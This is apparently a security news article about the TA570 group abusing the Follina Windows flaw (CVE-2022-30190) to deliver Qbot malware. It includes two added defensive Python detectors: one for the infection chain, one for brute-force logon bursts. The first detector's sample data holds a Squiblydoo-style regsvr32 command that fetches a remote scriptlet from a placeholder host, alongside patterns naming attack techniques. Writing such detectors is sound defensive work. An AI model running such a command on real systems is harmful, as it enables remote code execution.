Hackers are now abusing the Follina flaw to spread the Qbot malware

June 13, 2022
Tags: Hackers, Follina Flaw, Qbot Malware, Infostealer, Banking Trojan, Windows Vulnerability

Following earlier reports of a newly discovered zero-day vulnerability affecting Windows, tracked as Follina (CVE-2022-30190), security researchers now report seeing threat operators abuse the flaw in phishing attacks to spread the Qbot malware.

Among the groups recently exploiting the bug is TA413, which used it against the Tibetan diaspora. The TA570 threat group was also seen abusing the zero-day flaw to infect its targets with Qbot.

The ongoing phishing campaign abusing Follina uses hijacked email thread messages carrying HTML attachments that download ZIP files. Opening a ZIP file presents the victim with an IMG disk image holding a DLL, a Word document, and shortcut files.

The shortcut files in the IMG disk image load the Qbot DLL directly onto the victim's machine. Meanwhile, the blank Word document contacts an external server to load another HTML file, which exploits Follina to run PowerShell code that downloads and launches a second Qbot DLL payload.

An in-depth investigation found that the tactics used in this phishing campaign to spread Qbot match those of the TA570 threat group.

TA570, a Qbot affiliate, used two different tactics to infect its victims, which suggests it is running test campaigns to see which tactic is more effective.

According to researchers, many Qbot affiliates are known for switching attack vectors; in February, for example, operators turned to an old technique called Squiblydoo to spread Qbot through MS Office files using regsvr32[.]exe.
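As an added example (not from the article or from the researchers it cites), the following Python script applies simple process-creation heuristics to the two delivery chains described above: an Office process spawning a script host (the Word-to-PowerShell step attributed to Follina), a DLL loader given a DLL that sits outside the system directories (the shortcut-to-DLL step from a mounted IMG image), and the regsvr32 Squiblydoo pattern. The event field names, the sample events, the script-host set and the trusted-path list are constructed assumptions rather than a real telemetry schema.

```python
import re

# Constructed field names (parent_image, image, command_line): not a real Sysmon/EDR schema.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# msdt.exe is the troubleshooter binary that Follina (CVE-2022-30190) abuses; the article
# only names PowerShell, so the rest of this set is an assumption for the heuristic.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "msdt.exe"}
DLL_LOADERS = {"regsvr32.exe", "rundll32.exe"}
# Assumed allow-list: DLLs loaded from these prefixes are treated as benign here.
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

DLL_PATH = re.compile(r'([a-z]:\\[^"]+?\.dll)')   # drive-letter path ending in .dll
SQUIBLYDOO = re.compile(r"/i:\s*https?://")      # regsvr32 /i:<url> scriptlet fetch


def basename(path):
    """Return the lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the list of heuristic names that fire for one process-creation event."""
    parent = basename(event["parent_image"])
    image = basename(event["image"])
    cmd = event["command_line"].lower()
    hits = []

    # 1. An Office document spawning a script host: the Word -> PowerShell step
    #    the article attributes to the Follina exploit.
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append("office-spawns-script-host")

    # 2. Squiblydoo: regsvr32 fetching a remote scriptlet through scrobj.dll.
    if image == "regsvr32.exe" and "scrobj.dll" in cmd and SQUIBLYDOO.search(cmd):
        hits.append("regsvr32-squiblydoo")

    # 3. A DLL loader handed a DLL path outside the trusted system directories,
    #    e.g. a DLL on a mounted IMG image as in the shortcut-file step.
    if image in DLL_LOADERS:
        for dll in DLL_PATH.findall(cmd):
            if not dll.startswith(TRUSTED_PREFIXES):
                hits.append("dll-from-untrusted-path")
                break
    return hits


# Constructed sample events (not real telemetry); event 3 is a benign control case.
SAMPLE_EVENTS = [
    {"parent_image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command_line": "powershell.exe -NoProfile -WindowStyle Hidden -Command (constructed placeholder)"},
    {"parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\regsvr32.exe",
     "command_line": "regsvr32.exe /s D:\\docs\\update.dll"},
    {"parent_image": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\regsvr32.exe",
     "command_line": "regsvr32.exe /s /n /u /i:http://example.invalid/x.sct scrobj.dll"},
    {"parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\regsvr32.exe",
     "command_line": "regsvr32.exe /s \"C:\\Program Files\\Vendor\\app.dll\""},
]


def scan(events):
    """Return (event index, heuristic name) pairs for every hit across a batch of events."""
    return [(i, hit) for i, ev in enumerate(events) for hit in classify(ev)]


if __name__ == "__main__":
    for index, hit in scan(SAMPLE_EVENTS):
        print(f"event {index}: {hit}")
```

The three heuristics are deliberately independent so that each fires on a different stage of the chain; in a real pipeline they would be tuned against the environment's own allow-list of Office add-ins and legitimate DLL locations, since the trusted-path prefix check alone will flag vendor software installed outside Program Files.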

The malware discussed here goes by several other names, such as Pinkslipbot, Qakbot, and Quakbot. Qbot is a banking trojan and infostealer targeting Windows, with worming features that let it infect more devices within a compromised network. It can also run brute-force attacks against Active Directory administrator accounts.
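The brute-force behaviour just mentioned shows up to defenders as bursts of failed logons against privileged accounts. The following Python script, an added example that is not part of the article, counts failed-logon records per (source host, account) pair inside a sliding time window and reports any watched account whose failure count from one source crosses a threshold. The record layout, the watched-account list, the threshold and the sample records are constructed assumptions; a real deployment would feed it Windows Security event 4625 (logon failure) data.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed failed-logon records as (ISO timestamp, target account, source host).
SAMPLE_FAILURES = [
    # WS-17 hammers the built-in administrator account: six failures in 25 seconds.
    ("2022-06-13T09:00:00", "Administrator", "WS-17"),
    ("2022-06-13T09:00:05", "Administrator", "WS-17"),
    ("2022-06-13T09:00:10", "Administrator", "WS-17"),
    ("2022-06-13T09:00:15", "Administrator", "WS-17"),
    ("2022-06-13T09:00:20", "Administrator", "WS-17"),
    ("2022-06-13T09:00:25", "Administrator", "WS-17"),
    # WS-03: a person mistyping a service-account password three times over ten minutes.
    ("2022-06-13T09:01:00", "svc-backup", "WS-03"),
    ("2022-06-13T09:05:00", "svc-backup", "WS-03"),
    ("2022-06-13T09:11:00", "svc-backup", "WS-03"),
    # WS-22: a tight burst, but against an unprivileged account that is not watched.
    ("2022-06-13T09:02:00", "jdoe", "WS-22"),
    ("2022-06-13T09:02:01", "jdoe", "WS-22"),
    ("2022-06-13T09:02:02", "jdoe", "WS-22"),
    ("2022-06-13T09:02:03", "jdoe", "WS-22"),
    ("2022-06-13T09:02:04", "jdoe", "WS-22"),
]

# Assumed list of privileged accounts worth watching (lower-cased for comparison).
WATCHED_ACCOUNTS = {"administrator", "svc-backup"}


def find_bursts(failures, watched, threshold=5, window=timedelta(seconds=60)):
    """Return (source, account, peak count) for each watched account that sees at least
    `threshold` failures from a single source within any interval of length `window`."""
    by_key = defaultdict(list)
    for stamp, account, source in failures:
        acct = account.lower()
        if acct in watched:
            by_key[(source, acct)].append(datetime.fromisoformat(stamp))

    alerts = []
    for (source, acct), times in by_key.items():
        times.sort()
        start = 0
        peak = 0
        # Sliding window: move `start` forward until the span fits inside `window`,
        # and remember the densest run of failures seen for this (source, account).
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts.append((source, acct, peak))
    return alerts


if __name__ == "__main__":
    for source, acct, peak in find_bursts(SAMPLE_FAILURES, WATCHED_ACCOUNTS):
        print(f"possible password guessing: {source} -> {acct} ({peak} failures in 60s)")
```

Keying on the source host as well as the account is what separates a worm-style spread from one user's typos: the WS-03 failures never cluster tightly enough to alert, while a single workstation producing a dense burst against an administrator account is exactly the lateral-movement signal worth investigating, and the host identity tells the responder where to start.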

Many hackers also utilise Qbot to steal data from its victims, including banking credentials and personal information. Some of the most notorious ransomware gangs, such as REvil and Egregor, have also used the malware in their operations to gain initial access to corporate networks.